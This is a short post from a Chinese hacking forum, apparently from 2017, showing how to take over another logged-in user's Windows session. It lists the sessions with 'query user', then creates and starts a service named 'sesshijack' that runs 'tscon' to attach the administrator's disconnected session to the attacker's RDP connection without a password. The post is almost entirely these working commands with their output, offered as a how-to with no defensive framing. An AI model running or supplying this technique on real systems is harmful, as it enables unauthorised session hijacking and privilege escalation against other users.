搜索
查看: 917|回复: 0

windows切换其他登陆用户

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-3-23 16:18:47 | 显示全部楼层 |阅读模式
查看用户:
  1. C:\Windows\system32>query user
  2. USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
  3. administrator                             1  Disc            1  3/12/2017 3:07 PM
  4. >localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM
  5. C:\Windows\system32>
复制代码
创建服务:
  1. C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
  2. [SC] CreateService SUCCESS
复制代码
启动服务:
  1. net start sesshijack
复制代码
细节:
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表